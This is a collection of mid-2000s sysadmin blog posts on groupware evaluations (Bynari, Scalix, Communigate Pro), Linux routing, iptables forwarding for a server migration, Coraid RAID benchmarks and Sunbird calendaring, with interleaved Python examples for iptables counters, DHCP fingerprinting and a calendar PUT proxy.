A few years ago I heard of a company called Bynari that was working on an Exchange replacement. In fact at my previous job it came down to either Bynari Insight Server or Communigate Pro. The reason I picked the latter was twofold. One, I had pretty good experience with using Communigate in a large ISP environment (1 million users). Two, the storage system I had was a NAS mounted via NFS, and (at the time) Cyrus IMAP (which was included with Bynari) had many caveats listed on their site about using NFS. They didn't recommend it.
These days I have no such restriction and am free to experiment. I downloaded the latest eval version. What I like about Bynari is it's primarily based on open source tools: Apache, OpenLDAP, Cyrus IMAP, Postfix, ProFTPD, Amavis, SpamAssassin, Clamav, etc. Installation was a cinch on CentOS. Their site mentions Debian support as well, but strangely I only see RPMs.
So what's good about it? The web admin is surprisingly straightforward. It's probably the first interface that actually makes LDAP comprehensible. It was easy for me to set up domains, add users, etc. The webmail/groupware interface is also pretty nice. This is probably the most important thing I'm looking for, because I want to remove dependency on Outlook. I don't much care about the Outlook Connectors and such. Bynari's webmail is not Outlook Web Access, but does have a decent calendar interface. You can schedule meetings and see shared folders via the web client. It's lightweight and things work as expected. I did like the way Cyrus was storing messages: plain text files. Maybe Cyrus was just configured to run this way, because I remember it using Berkeley DB files in the past.
One problem I noticed was that when someone accepted or rejected a meeting, the attendee response is not visible in the original calendar entry. You can't tell whether someone accepted or rejected it. This seems a bug to me, which I've asked their support about. Also, on the recipient end, the calendar entry does not include the attendee information. So I can imagine users having questions like "Who was this meeting with again?"
I tried to migrate a 1.9gig PST file. Bynari provides a PST import tool via the web interface. But come on, 1.9gigs submitted in a web form? It crashed my Safari, and Firefox said "blow me." That import method does not seem useful to me. The way I imported data in Communigate was to install their Outlook connector, and use Outlook to import the PST. Well I tried the same with Bynari, and it pretty much crashed Outlook... sigh. Next I tried just copying from PST to the IMAP server in Outlook, which again crashed. I do have to get data from Outlook users into whatever server we use, and I want that to be done easily.
Meanwhile Scalix got some good press at LinuxWorld. It seems their new version has improved the admin interface, which was sorely lacking in the version I tested. I like Scalix's webmail interface, but I hate the complexity of the HP openmail system. It reminds me of people being hired just to administer openmail. It's a fucking mail server, it doesn't have to be this complicated! Looking at the Scalix manual all you see are chapters filled with cryptic om(insert-jobsecurity-acronym-here) commands. It's just silly to expect someone to spend time learning this crap, because when something goes wrong in such a closed system, no one will know how to fix it.
It looks like Communigate is still the choice for us.
As I mentioned, we installed a small form factor PC as a router. It's currently in test mode. One thing I noticed is sometime after bootup the blue power LED starts flashing, maybe twice a second. The system appears normal. I was concerned it might be overheating or something, so I installed lm_sensors and the SMART (ide) utilities. That took a bit to get working, mainly because Debian Stable had old versions and I ultimately had to get the latest source.
When I check sensors output, it lists quite a few warnings about voltage, 1 out of 3 fans not running, and the CPU running at 88 degrees celsius. That temperature sounds insanely high, and I'm doubting whether the output is correct. I then ran smartctl on my IDE drive and it reported temperature of 40 C. I would assume if the CPU is very hot, the HD temperature would be high as well since it sits right above the CPU in the small case.
I haven't noticed any weird hangs or crashes. Just the flashing blue power LED. Tomorrow at work I'm going to reboot it and quickly check the BIOS temperature reports. My co-worker says it could need a BIOS flash update. It's a cool little box, but would suck if it's overheating.
Update: Rebooted the system this morning and the BIOS reported a CPU temperature of 52 C. That seems reasonable. Just before the reboot sensors said 88 C, so I know it must be wrong, or there is some awesome cooldown system going on between the time it takes me to reboot and get to the BIOS. What's also weird is now after reboot sensors says my CPU temp is 25 C, and reports a different temperature field as 42 C. Forget sensors on this motherboard, I don't trust that output.
I looked at my Tmobile bill today and noticed it was $10 higher than normal. I have their 'get more' plan that gives 600 'whenever' minutes. I never come even close to using my cell that much.
So I'm looking at the charges, and noticed that the $10 was from 411 calls! WTF? Tmobile is charging $1.25 for each 411 call. That is such a fucking ripoff. Why can't they use the 'whenever' minutes that I never used to pay for this crap?
On the bill envelope they are encouraging people to dial 411. Their desire to squeeze as much money as possible from customers is vividly apparent.
I'm working for a client to migrate a fairly busy web server to a new network. Obviously, we would like to keep downtime to a minimum.
The main issue in such migration scenarios is DNS. You need to be sure to have low TTL values so that when you switch the IP, users go to the new site fairly quickly. Usually you would update the TTL many days in advance. TTL does not always work as expected however, and there are some DNS servers that ignore TTL in an effort to cache more.
During the time between changing DNS and remote DNS servers getting the new IP, there will be connections to both servers. One possible solution to this is to implement port forwarding on the old server to redirect requests to the new one. There are different ways to do this, such as port forwarding daemons, Apache doing proxying, etc. However I found the simplest method is using Linux's iptables. This of course assumes the old server is a Linux system.
Suppose we are on the old server and the new server is 5.6.7.8. We want to redirect HTTP and HTTPS traffic. The following commands will do it:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --dport 80 -i eth0 -j DNAT --to 5.6.7.8:80
iptables -t nat -A PREROUTING -p tcp --dport 443 -i eth0 -j DNAT --to 5.6.7.8:443
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
As soon as you run these commands, all connections are transparently sent to the new server. Just keep this on until there are no more requests coming to the old server.
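One way to tell when no more requests are reaching the old server is to compare the packet counters of the two DNAT rules between two runs of `iptables -t nat -L PREROUTING -n -v -x`. This is an added example, not part of the original post; the two listings are constructed sample output.

```python
"""Decide when the DNAT forwarding on the old server can be removed.

Added example. Parses the text printed by
    iptables -t nat -L PREROUTING -n -v -x
and compares the DNAT rule counters between two snapshots. In the nat table
only the first packet of a connection is matched, so a counter delta is the
number of new connections forwarded in that window.
"""
import re

# Constructed sample: counters at the start of the observation window.
SNAPSHOT_BEFORE = """\
Chain PREROUTING (policy ACCEPT 9120 packets, 612345 bytes)
    pkts      bytes target     prot opt in     out     source               destination
   48211  2892660 DNAT       tcp  --  eth0   *       0.0.0.0/0            0.0.0.0/0            tcp dpt:80 to:5.6.7.8:80
    3310   198600 DNAT       tcp  --  eth0   *       0.0.0.0/0            0.0.0.0/0            tcp dpt:443 to:5.6.7.8:443
"""

# Constructed sample: a day later, port 80 still sees stragglers, port 443 none.
SNAPSHOT_AFTER = """\
Chain PREROUTING (policy ACCEPT 9544 packets, 640112 bytes)
    pkts      bytes target     prot opt in     out     source               destination
   48228  2893680 DNAT       tcp  --  eth0   *       0.0.0.0/0            0.0.0.0/0            tcp dpt:80 to:5.6.7.8:80
    3310   198600 DNAT       tcp  --  eth0   *       0.0.0.0/0            0.0.0.0/0            tcp dpt:443 to:5.6.7.8:443
"""

# One rule line: packet count, byte count, target DNAT, protocol, then the
# match ("dpt:PORT") and the rewrite destination ("to:IP:PORT").
RULE_RE = re.compile(
    r"^\s*(?P<pkts>\d+)\s+(?P<bytes>\d+)\s+DNAT\s+(?P<proto>\S+)\s+.*?"
    r"dpt:(?P<dport>\d+)\s+to:(?P<to>\S+)\s*$"
)


def parse_dnat_counters(listing):
    """Return {(proto, dport, target): packets} for every DNAT rule line."""
    counters = {}
    for line in listing.splitlines():
        m = RULE_RE.match(line)
        if m:
            counters[(m["proto"], int(m["dport"]), m["to"])] = int(m["pkts"])
    return counters


def forwarded_since(before, after):
    """New connections each DNAT rule forwarded between the two listings.

    A rule that only exists in `after` counts from zero. If a counter went
    backwards (rules reloaded or counters zeroed), the `after` value is used.
    """
    old = parse_dnat_counters(before)
    new = parse_dnat_counters(after)
    deltas = {}
    for rule, pkts in new.items():
        previous = old.get(rule, 0)
        deltas[rule] = pkts - previous if pkts >= previous else pkts
    return deltas


def safe_to_remove(before, after):
    """True only if DNAT rules were found and none forwarded anything."""
    deltas = forwarded_since(before, after)
    return bool(deltas) and all(n == 0 for n in deltas.values())


if __name__ == "__main__":
    for (proto, dport, to), n in forwarded_since(SNAPSHOT_BEFORE,
                                                 SNAPSHOT_AFTER).items():
        print("%s/%d -> %s: %d new connections" % (proto, dport, to, n))
    print("safe to remove:", safe_to_remove(SNAPSHOT_BEFORE, SNAPSHOT_AFTER))
```

Because of the MASQUERADE rule, the new server logs every forwarded connection with the old server's address, so the counters on the old server are the place to measure them.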
I set up an Idotpc Ibox Crystal P4c small form factor PC with a Sangoma card and made it our T1 router through Bellsouth.
The PC is a 2.4 GHz Celeron with 1 gig RAM and 40 gig HD. It costs $500 and was the cheapest small form factor PC I found for the specs. Another $500 went to the T1 card, so for roughly $1k you have a Linux router. The Sangoma was not too difficult to set up. I had some hiccups using the 'stable' driver with Debian Woody, and was told by tech support to use the beta instead. That worked fine.
The small PC is rather nice looking, and has a purple light that looks cool in the dark. This is our first step at moving core services to small form factor PCs. We also plan to test a Mac Mini Debian server.
Contrast this with the monstrosity that is the Dell Poweredge 2800. We received one of these and when I saw the box on a wooden crate, I said WTF. Since when have Dell tower servers become so ridiculously large? The depth is 28 inches and it weighs 108 pounds!
Such big iron systems are becoming less and less appealing to me.
Today I installed 10 Hitachi Deskstar 120gig HDs into a Coraid box. My prediction was pretty much correct. I've set up the drives in a RAID 1+0 setup, where 5 pairs of mirrors are striped. I'm seeing about 24 MB/sec read, and 30 MB/sec write. Check out the bonnie output.
The Daily Show mentioned a website that lists the worst things on TV. I had to check these out.
A friend sent me a link to someone criticizing Hula. He claims group calendaring should get people laid.
Came across the Hula project on Slashdot. This is an email and calendaring server that is striving to have a Gmail-like interface. The developers seem very optimistic.
I decided to download it to check it out. I have a CentOS 3.4 box at home, and installation was not too difficult. I was able to get it up and running to check out its webmail interface. Some notes:
mv /usr/include/asm/atomic.h{,.old}
cp /usr/src/linux/include/asm/atomic.h /usr/include/asm/
CPPFLAGS=-I/usr/kerberos/include ./configure --prefix=/opt/hula
The rest of the instructions should be fine. The system is definitely not ready for prime time, but it's cool to check out. I hope it moves forward.
Google's front page links to a Valentine's Day search. Am I the only one who finds it hilarious that the first link has the text "Watch The St. Valentine's Day Massacre"? lol...
There's a very interesting article in the Feb 2005 issue of SysAdmin magazine titled Next Generation DHCP Deployments. Unfortunately the article is not available online.
It describes University of Kansas' DHCP setup, which has to deal with any crazy student plugging their virus-laden PC into the network. They designed a very ingenious system that does many things. First off it does passive OS fingerprinting by looking at the DHCP request sent by a device. It turns out every device/OS sends a unique DHCP request packet with certain options set. They've built a database of every possible device, from Linksys routers to Windows versions. They can deny/accept requests based on this data.
Another cool thing is they tag the DHCP request with VLAN information and are able to determine where exactly the device is. This lets them quickly track down security problems, and can be used to stop people from installing a hub at the network port connecting many systems to it.
So what about rogue DHCP servers that someone decides to set up? Well the network switches are configured to only allow a certain trusted port to send DHCP responses. Hmm, but I still don't understand how they handle systems set up with a static IP.
Anyhow, it reminded me of how much different it is working as sysadmin in a university. The problems there seem a lot more grand than the problems at a small company, and the solutions are grand as well.
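The fingerprinting step described above can be sketched as follows: read the options of a DHCP request, take the order of the parameter request list (option 55) and the vendor class (option 60) as the fingerprint, and look it up in a policy table. This is an added example, not code from the article or from the University of Kansas; the table entries, the default action for unknown devices and the sample packet are constructed.

```python
"""Passive DHCP fingerprinting reduced to one core case (added example).

The fingerprint is the ordered parameter request list (option 55) plus the
vendor class identifier (option 60). FINGERPRINTS is a constructed sample
table, not an authoritative database.
"""
import struct

BOOTP_HEADER_LEN = 236                 # fixed BOOTP fields before the options
MAGIC_COOKIE = b"\x63\x82\x53\x63"     # marks the start of DHCP options
OPT_PAD, OPT_END = 0, 255
OPT_MSG_TYPE, OPT_PARAM_REQ_LIST, OPT_VENDOR_CLASS = 53, 55, 60

# Constructed policy table: (option 55 order, option 60) -> (label, action)
FINGERPRINTS = {
    ("1,15,3,6,44,46,47,31,33,249,43", "MSFT 5.0"): ("Windows 2000/XP", "allow"),
    ("1,3,6,15,28", "example-router 1.0"): ("home router (sample)", "deny"),
}


def parse_options(packet):
    """Return {option code: value bytes}; raise ValueError on malformed input."""
    if len(packet) < BOOTP_HEADER_LEN + len(MAGIC_COOKIE):
        raise ValueError("too short for a DHCP packet")
    start = BOOTP_HEADER_LEN
    if packet[start:start + 4] != MAGIC_COOKIE:
        raise ValueError("missing DHCP magic cookie")
    options = {}
    i = start + 4
    while i < len(packet):
        code = packet[i]
        if code == OPT_PAD:            # single-byte padding, no length field
            i += 1
            continue
        if code == OPT_END:
            break
        if i + 1 >= len(packet):
            raise ValueError("option %d has no length byte" % code)
        length = packet[i + 1]
        value = packet[i + 2:i + 2 + length]
        if len(value) != length:       # length field points past the packet
            raise ValueError("option %d is truncated" % code)
        # A repeated option is a continuation of the earlier value.
        options[code] = options.get(code, b"") + value
        i += 2 + length
    return options


def fingerprint(packet):
    """Return (parameter request list as 'a,b,c', vendor class string)."""
    opts = parse_options(packet)
    prl = ",".join(str(b) for b in opts.get(OPT_PARAM_REQ_LIST, b""))
    vendor = opts.get(OPT_VENDOR_CLASS, b"").decode("ascii", "replace")
    return prl, vendor


def classify(packet, default=("unknown", "deny")):
    """Look the fingerprint up; the default for unknown devices is an assumption."""
    return FINGERPRINTS.get(fingerprint(packet), default)


def build_request(options, mac=b"\x02\x00\x00\x00\x00\x01"):
    """Build a constructed BOOTREQUEST carrying the given (code, value) options."""
    header = struct.pack("!BBBBIHH4s4s4s4s16s64s128s",
                         1, 1, 6, 0, 0x12345678, 0, 0,
                         b"", b"", b"", b"", mac, b"", b"")
    body = b"".join(bytes([code, len(val)]) + val for code, val in options)
    return header + MAGIC_COOKIE + body + bytes([OPT_END])


# Constructed sample packets.
SAMPLE_DISCOVER = build_request([
    (OPT_MSG_TYPE, b"\x01"),
    (OPT_VENDOR_CLASS, b"MSFT 5.0"),
    (OPT_PARAM_REQ_LIST, bytes([1, 15, 3, 6, 44, 46, 47, 31, 33, 249, 43])),
])
SAMPLE_UNKNOWN = build_request([
    (OPT_MSG_TYPE, b"\x01"),
    (OPT_PARAM_REQ_LIST, bytes([1, 3, 6])),
])

if __name__ == "__main__":
    for name, pkt in (("known", SAMPLE_DISCOVER), ("unknown", SAMPLE_UNKNOWN)):
        print(name, fingerprint(pkt), classify(pkt))
```

Both fields are chosen by the client, so a match identifies what a device claims to be; it is a triage signal for the deny/accept decision rather than proof of the operating system.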
I heard a pretty cool cover of Britney Spears' Toxic on the radio by Local H. Searched on Itunes for it but wasn't there. Then I found it was downloadable as an MP3 from their site. Check it out, it's Nirvana doing Toxic. It sounds a lot better than the original.
The latest update to the Linux on Mac Mini page informed me of how to burn ISO images in OS X. I have been normally using cdrecord, which has been giving me coasters unless I set the recording speed to 8. I wondered if there was a way to burn ISOs without cdrecord, and in fact there is. Disk Utility allows you to do it!
We received a Coraid shelf at work for some testing. I was always interested in testing out this system. The cost savings of being able to use commodity hard drives easily attachable to the network was very appealing. Here are my experiences with the product.
My main objective was to gauge performance with software RAID and test failure scenarios. Each drive has a 100mb ethernet port. I was hoping for gigabit, but oh well. The preferred setup is to connect all drives to a separate switch with a gigabit uplink to the server. This way the aggregate throughput can scale well, and it seems to.
The Linux driver is very clean, and as you plug in new drives, they are automatically detected. On my 2.4 kernel, I get the found drives listed in /dev/etherd/stat:
/dev/etherd/e0.3 eth1 up
/dev/etherd/e0.1 eth1 up
/dev/etherd/e0.0 eth1 up
/dev/etherd/e0.2 eth1 up
Then you just use those devices just like hard drives. It is pretty amazing, and I'm impressed with how easy it was to get up and going. Now for the performance tests.
The max throughput in my tests to a specific drive, both read and write, was about 5 MB/sec. For a hard drive this is very slow, so RAID needs to be used to get more speed.
Using simple RAID 0 (striping across drives) results in the best speeds, but of course there is no redundancy. In such a case, the system seemed to scale well. I tested with 4 40gig hard drives, and my throughput, both read and write, was about 20 MB/sec.
As expected, RAID 1 gives less than stellar performance. About 5 MB/sec read, and 5 MB/sec write when using 2 drives.
With RAID 5, I ran into lots of problems. In the 4 disk scenario, I got 20 MB/sec read, and 1 MB/sec write. Yes, that's 1 MB/sec. What is also weird is a 3 disk RAID 5 did its resync at 1 MB/sec, whereas a 4 disk RAID 5 resync'ed at 3.5 MB/sec. I am still not sure what's going on here, but it appears to be something with the Linux RAID software or my CPU. I know that RAID 5 involves lots of XORing, and it is almost like this is CPU bound on my system (Dell Poweredge 1650 P3 1 GHz).
Thinking about this more, RAID 5 is not very appealing. I don't trust the rebuild times. Also if 2 drives die, you are dead. Next I tested RAID 1+0, which doesn't have these limitations. Well it does, but there is less chance of complete failure. This seems to be the best choice for us. With my 4 40 gig HDs, with RAID 1 across 2 drives, and RAID 0 across the 2 pairs, I see about 10 MB/sec both read and write. Now we are getting somewhere. I'm guessing this will continue to scale. We have ordered 10 120gig drives to put in the box, and if my predictions are right, I should see about 20-25 MB/sec. I plan to use this for a mail server, and I would consider those rates acceptable.
The system shelf is rather bare. Don't expect visual appeal like an IBM or Dell system. The shelf is smaller than it looks, which is good for us because we don't have much space. The blades are bare circuit boards, rather tough to get a grip and slide out when the drive is attached, and when the system is live I do sometimes wonder if I'll get shocked hot swapping them.
The technical support is very good. They are the ones who wrote the ATA over Ethernet driver, and I hear it is in the latest 2.6 kernels.
Well it looks like the fix I made was actually implemented in Communigate, so my script will soon go into my museum of dead code. There must have been other users requesting this:
* HTTP: the CalendarDataDel realm is supported now (same as the CalendarData realm, but PUT operations delete all existing iCalendar items first).
Well, it was fun to work on either way, and this fix is not in the stable release of Communigate yet.
I had some questions for the Mozilla Calendar development group. I posted a message to the newsgroup but didn't get any response. I did some research and found this bug which doesn't appear to have been updated in over 6 months. I decided to send an email to the email address the bug is assigned to, which is supposedly the Mozilla Calendar development group. I got an undeliverable message back about the account not existing. I even sent an email to the QA contact but he stated he is not part of that group.
As my message stated, I've been having ideas of adding code to Mozilla Calendar/Sunbird to store data in IMAP. It seems a large undertaking but it seems at least a few people are interested in developing this. However, it is not clear whether this is a good idea or not. Mark Crispin of UW IMAP tells me:
Basically, IMAP was designed for messaging, not calendaring; so it lacks tools which are needed for calendaring, and tools which could be used for calendaring aren't quite right.
There is a working group at IETF that is working on calendaring. They haven't progressed very well, and I suspect that if we try to duplicate their work in IMAP we may have the same problems.
None of this is intended to discourage you from developing calendaring in IMAP. Rather, I'm just sounding some notes of caution.
Good advice. This needs to be thought through. I'm torn between a 'build it and they will come' attitude versus wait until something else comes along. But judging from my research so far, robust calendaring seems to be at a standstill.
Update: I found this blog which describes the future of Sunbird. It looks like they are going towards CalDAV as the standard.
Dealing with groupware calendaring issues has been taking a lot of my time. I usually like to do some programming every now and then to sharpen my skills. Programming to me falls under the use it or lose it category. I work on small projects occasionally as you can see from my home page, and needed to work on something new. It's sort of a catharsis for me.
Python is my language of choice these days. The language never ceases to amaze me. It's just beautiful and simple. I've noticed that the end result usually has fewer bugs than something I've written in other languages.
So, during my tests of group calendaring and Mozilla Sunbird, I found out that when used with the Communigate Pro mail server, deleting calendar events on a remote calendar does not work. It has to do with Sunbird issuing an HTTP PUT for its calendar data, and Communigate assuming this to be an append of data, rather than a replace.
Mozilla 'shared' calendaring in its current state is a complete hack that is not scalable at all. It involves first retrieving the whole calendar from a server, making a change, and then posting the whole calendar back to the server. Think about if you have a large calendar with 1meg of data. This gets extremely slow and inefficient.
Regardless, I wanted to get Sunbird working with Communigate. I looked at the available operations on CG's calendar interface, and realized what I need to do is convert the HTTP PUT from Sunbird into a combination of an HTTP DELETE and HTTP PUT. So began the idea of my next script.
It took me about 5 hours to make a multithreaded HTTP proxy to do this in Python. If you examine the code, you will see just how simple this is. Python includes an HTTP server class that is easily extended, and I got a lot of help from the excellent book Foundations of Python Network Programming. What's also amazing is to make it multithreaded, I just needed to inherit a threading class! Nothing else at all, it just works!
I'll spare the details, but one thing I especially liked was this line of code:
self.respond_client(*self.cg_request('GET'))
This is the implementation of the GET request. It's a strange syntax, but here is what it's doing. respond_client() needs to have 2 arguments passed to it. cg_request() returns a tuple with 2 values. A tuple is essentially a read-only list. The * prepended to the function call makes the tuple expand into function arguments. Amazing I tell you!
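The proxy idea described above, as an added example in Python 3; it is not the author's script. The names respond_client() and cg_request() are taken from the line quoted in the post, but their bodies, the upstream address, the body size limit and the request path used in the demo are assumptions.

```python
"""Threaded HTTP proxy that turns a client PUT into DELETE followed by PUT.

Added example. `upstream` stands for the calendar server; run_demo() uses an
in-process fake calendar server that only records the methods it receives.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn

MAX_BODY = 4 * 1024 * 1024        # assumed cap on an uploaded calendar


class ThreadedProxy(ThreadingMixIn, HTTPServer):
    """Inheriting ThreadingMixIn is all it takes to serve each request in a thread."""
    daemon_threads = True
    upstream = ("127.0.0.1", 8100)    # placeholder address of the real server


class CalendarProxyHandler(BaseHTTPRequestHandler):
    def cg_request(self, method, body=None):
        """Send one request upstream and return a (status, payload) tuple."""
        # Pass the client's credentials through so the upstream server,
        # not the proxy, keeps deciding who may touch the calendar.
        headers = {name: self.headers[name]
                   for name in ("Authorization", "Content-Type")
                   if name in self.headers}
        conn = http.client.HTTPConnection(*self.server.upstream, timeout=10)
        try:
            conn.request(method, self.path, body=body, headers=headers)
            resp = conn.getresponse()
            return resp.status, resp.read()
        finally:
            conn.close()

    def respond_client(self, status, payload):
        self.send_response(status)
        self.send_header("Content-Length", str(len(payload)))
        self.end_headers()
        self.wfile.write(payload)

    def do_GET(self):
        # cg_request() returns a 2-tuple; * expands it into the two arguments.
        self.respond_client(*self.cg_request("GET"))

    def do_PUT(self):
        length = int(self.headers.get("Content-Length", 0))
        if length > MAX_BODY:
            self.respond_client(413, b"calendar too large")
            return
        body = self.rfile.read(length)     # read the upload before deleting
        status, payload = self.cg_request("DELETE")
        if status >= 400 and status != 404:    # 404: nothing stored yet
            self.respond_client(status, payload)
            return
        # If this PUT fails the old data is already gone; the client still
        # holds the full calendar and gets the error status to retry on.
        self.respond_client(*self.cg_request("PUT", body))

    def log_message(self, fmt, *args):     # keep the demo quiet
        pass


def run_demo():
    """PUT once through the proxy; return (status, methods the upstream saw)."""
    seen = []

    class FakeCalendar(BaseHTTPRequestHandler):
        def _reply(self):
            self.rfile.read(int(self.headers.get("Content-Length", 0)))
            seen.append(self.command)
            self.send_response(200)
            self.send_header("Content-Length", "0")
            self.end_headers()
        do_GET = do_PUT = do_DELETE = _reply

        def log_message(self, fmt, *args):
            pass

    upstream = HTTPServer(("127.0.0.1", 0), FakeCalendar)
    proxy = ThreadedProxy(("127.0.0.1", 0), CalendarProxyHandler)
    proxy.upstream = upstream.server_address
    for srv in (upstream, proxy):
        threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        conn = http.client.HTTPConnection(*proxy.server_address, timeout=10)
        conn.request("PUT", "/CalendarData/demo",      # constructed path
                     body=b"BEGIN:VCALENDAR\r\nEND:VCALENDAR\r\n")
        status = conn.getresponse().status
        conn.close()
    finally:
        for srv in (proxy, upstream):
            srv.shutdown()
            srv.server_close()
    return status, seen


if __name__ == "__main__":
    print(run_demo())
```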
It seems I'm digging myself deeper and deeper into group calendaring. Pete pointed out this interesting article, and we talked about an idea of getting Sunbird to store entries via IMAP in this iMIP format. The difficulty level of this looks to be high, but man it would be cool. I'm reading up on XUL now.
I posted the following on the Mozilla forum:
Proposal for Sunbird to support iMIP for calendar storage
As described here and other places, I think that it would be great if storage of calendar entries can be done on an IMAP folder.
Communigate Pro seems to do this internally, storing in the iMIP format. Essentially each calendar entry is a mail message in a folder. They implement a MAPI connector for Outlook that works over IMAP to access the calendar.
When deleting entries, just the one message is deleted. Assuming storage is maildir, this works pretty well. Likewise, additions just add one message. This seems a lot better than downloading the whole calendar in iCal format, making a change, and posting the whole calendar back. I've run into slowness problems with large calendars.
What's great about this is if Sunbird could speak IMAP and use this storage, it would interoperate with Communigate's own web calendaring, and also could be used by any IMAP server. It seems standard and open enough that other clients would be able to work with it.
Does anyone have thoughts on this? Any plans to implement this currently in Sunbird? I would honestly like to embark on such a project, but I don't know too much about the Mozilla platform. If someone could provide some pointers on where I could start that would be great.
Today it was pretty much decided at work that we want to move away from Outlook. I had originally been looking into MAPI interfaces for Outlook, and doing testing with Communigate. However, it was brought up that if we implement tight integration with Outlook we would become dependent on it. Better to cut the umbilical cord sooner than later.
Our idea is to instead go with Mozilla Thunderbird for mail via IMAP and Sunbird for calendaring. We would decouple calendaring from mail. Contacts would be done via LDAP. There are a lot of issues to consider, but the main ones are offline support and shared calendaring.
Thunderbird with IMAP will work fine for mail. I'm just not sure of the offline support. It is there, but you basically mark which folders you want to have available offline and it seems like you need to synchronize mail before going offline. I just know this may be problematic for users.
Sunbird can work off of a remote calendar as described here. With Communigate you can implement access restrictions to your calendar that a group of users could read/write to. This implements a basic shared calendar with delegation. Since these are just ical files, Communigate's web interface can also be used to access the calendar. This is very cool. You could most likely do this all without Communigate, but CG just makes it easier.
So what you have with the above setup is a calendar that others can access. Before you add a calendar entry in Sunbird, it first downloads your calendar from the server, makes the change, then posts it back. The one problem I have is it is prompting for the login information every time Sunbird starts and there is no option to save the password. It seems you can use a http://user:\pass@... format for the URL to post, but this seems rather scary to have your password cleartext. Other than that it seems to work well, but I'm not sure how this will work if someone has a very large calendar. Presumably the ical data is small.
The real problem is doing this offline. Sunbird appears to attempt retrieving the calendar from the server before you can make a change. It essentially ignores anything you do offline. It doesn't hang in OS X, but I've heard it does in Windows. It would be nice to configure it to allow some sort of offline editing.
I thought of even reading up on XUL and possibly coding something up that would attempt to post the local calendar every X minutes, ignoring errors, instead of attempting to retrieve the remote one first.
So in a nutshell the problems are:
I would love to go to a standard format and ditch Outlook. If everyone's data is stored in these formats, it will be much easier to code up scripts to implement any other needs as they arise (meeting scheduling, etc). But it will be an uphill battle for sure.
I came across the above article in Discover magazine about how anyone can be a producer/musician these days. It praised Garageband, a music orchestration program that comes with OS X.
Now I've always seen that little guitar on my Powerbook's dock, but I've never clicked it before. After reading the article, I thought I'd try it out.
I am amazed. The program makes it extremely simple to create music, and good quality music at that. It comes with drum loops, instruments, bass lines, guitar riffs, etc and the interface is unbelievably intuitive.
Now some background here, I used to work a lot with electronic keyboards, mostly doing sampling and hiphop music. I spent years doing that, cutting up samples, creating drum beats, working with some would-be artists, going to studios, etc. It was fun, but I stopped when most of my friends went elsewhere and I started a real job. Nowadays the field is saturated with producers, and my god, the equipment these days... you need a lot more money now to make good music.
I spent about an hour in Garageband and did what would take me 2 days to do on a sampling workstation/keyboard. The ease that you can manipulate waveforms, create loops, arrange and move them in your sequence (in real time!) is awesome. It almost makes me want to get back into music again.
This weekend I checked out Clint Eastwood's Million Dollar Baby. I've liked the films he's directed and they all are very intelligent.
This movie has Hilary Swank training to be a boxer, and she does awesome. Her Oscar nomination for this is well-deserved. Eastwood plays her trainer, and he does great as well.
Spoiler alert...
Oscar nods seem to always include a movie where someone dies on a deathbed. Well this boxer does die, and goes through a very sad sequence of events before she does so.
The boxer gets blindsided with an illegal punch that causes her to fall on a stool in the ring and break her neck, rendering her paralyzed from the neck down. Most movies at this point would show a person rehabilitating and triumphing over the disaster. In fact when I first saw it, I thought, no way, she is just getting started on her championship, this can't stop her. Wrong...
Eastwood movies have characters battling inner demons, and I thought the conversations between Eastwood and the priest were very interesting. The priest considers him a pagan, but in reality he is very spiritual. The movie eventually comes down to a euthanasia question. The priest says it is a sin to kill, but it's argued that it's a sin to keep the person living in such a state. She suffers so much that she attempts to bite off her tongue to bleed to death. It's a grueling scene.
The boxing scenes were top notch, and I was reminded of Scorsese's Raging Bull. It's a very sad movie, but if you can take it, go see it.
I'm currently testing Communigate Pro as a groupware solution. I've had great experience with it in the past. It's solid, stable, uses open standards, and painless to maintain. There is really nothing that comes close to its administration interface and it has a very nice filter plugin interface.
They have a MAPI plugin for Outlook which I had issues with in the past, but I'm hoping that it's much better now. What's very cool is it basically converts MAPI to IMAP, and stores things such as calendar items in standard ical format. They make a good effort to be cross-platform.
One issue that came up in the past was offline synchronization. I'm doing tests with a 2 gig PST file converted to MAPI, so we'll see how it goes.
Another was its web interface, which is extremely bare-bones. It works, but is just ugly. I did some searching and found this post about some nice skins. Personally I like the Rapsberry OSX theme the best.
I've set up a new blog for a buddy of mine, Scott Illsley, whom I used to work with. Check it out.
I've been evaluating Scalix at work as an Exchange replacement. The system is based on HP Openmail, which in my opinion is a piece of junk. Everything is stored in a proprietary format that is impossible to debug when there are problems.
One of the main selling points of Scalix is the web interface. This is supposed to rival Exchange's webmail, but seems a very clumsy interface to me. It's missing key features such as free/busy checking, not being able to create shared folders (needs to be done via Outlook), and no addressbook links when composing messages. It gave the impression of a hack job.
I played with the Outlook plugin, and certain public folders I created in Outlook wouldn't show up in the web interface. Other than that it seemed to work ok.
After installation, I had to change my hostname. Well Scalix did not like this at all and failed to find the 'mailnode' when adding users afterwards. It was non-intuitive what I needed to do to fix it, and my only solution was to completely re-install it. After that, I was even able to hang the Scalix server when I tried using Thunderbird with IMAP. Just pathetic.
Then there is the "admin" interface, which after you have seen Communigate Pro's, is lacking in many respects. It's just a simple user manager.. no server configuration at all.
The web interface requires Java and Tomcat/Jakarta on the server, and as with all Java crap there is version hell. I went through a few hours trying to get the right combinations of versions of Java and Tomcat that would work with Scalix.
When using offline sync'ing to Outlook, you are limited to 2GB in Scalix. So you can continue doing your maintenance of keeping users under 2GB. Yippeee.
I just could never see myself maintaining this in a production environment. The system is too complex and closed. Why the hell did they choose Openmail instead of the countless quality free mail servers out there?
It's sad that there is no good Exchange killer out there. This problem seems never ending. I would love to use Thunderbird and Sunbird for shared calendaring, but it is missing any concept of meeting scheduling (availability, accepting/rejecting meetings, etc).
I really admire OS X Server. This is a bundle of free software that works (Postfix, OpenLDAP, Cyrus, Apache), but where is the Exchange killer? How do people at Apple schedule meetings?
I've been using Ubuntu Linux on my home desktop for a few weeks. I like it very much, mainly because it is less of a moving target than Debian Testing. The forum support is very good, and I even got help on an issue I had.
I hadn't booted Windows in awhile, and this evening I attempted to. Lo and behold the boot loader appeared to hang. I thought my XP partition was hosed. In Linux, I was able to mount and read the NTFS partitions just fine, but it just wouldn't boot. I did a lot of searching, attempted XP's fixmbr, reloading grub, etc all with no luck. I finally started a Recovery Installation of XP.
During the recovery install I did more searching and eventually found this post on the Ubuntu forum, which in turn pointed to this article. The first reboot of recovery install was attempted, and XP wouldn't boot!
